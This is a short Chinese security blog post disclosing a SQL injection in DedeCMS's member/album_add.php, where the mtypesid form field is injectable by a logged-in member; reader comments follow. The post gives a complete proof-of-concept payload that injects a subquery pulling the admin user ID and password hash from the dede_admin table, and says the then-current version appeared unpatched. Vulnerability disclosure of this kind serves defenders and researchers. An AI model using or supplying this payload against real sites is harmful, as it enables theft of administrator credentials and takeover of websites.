您的位置 » 首页 » 渗透测试 » 漏洞播报:dedecms(织梦)album_add.php sql注入漏洞

漏洞播报:dedecms(织梦)album_add.php sql注入漏洞

发表于4年前 | 作者: seay | 分类: 渗透测试 | 孵化于:2013年10月08日 | 文章热度:11,598 次 全屏阅读

显示不全请点击全屏阅读

dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的

漏洞需要会员,所以比较鸡肋啦
发表文章处,post表单的mtypesid可以注入
/dedecmsnew/member/album_add.php
 
注入POC:

mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'','','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

作者:句子

Tags:

dedecms漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3419/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有4个筒子的人留下了脚印...

  • gbm 说:
    1楼
    2013 年 10 月 8 日 上午 6:24 回复

    帅哥你好,我来啦,帅哥我爱你哦~哈哈

  • phpbug 说:
    2楼
    2013 年 10 月 8 日 上午 11:52 回复

    帅哥你好,我来啦,帅哥我爱你哦~哈哈

    • 【管理员】seay 说:
      2013 年 10 月 9 日 上午 4:10 回复

      帅哥你好,我来啦,帅哥我爱你哦~哈哈

  • 追梦 说:
    3楼
    2013 年 10 月 13 日 上午 10:16 回复

    织梦漏洞太多了,都不敢用了

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)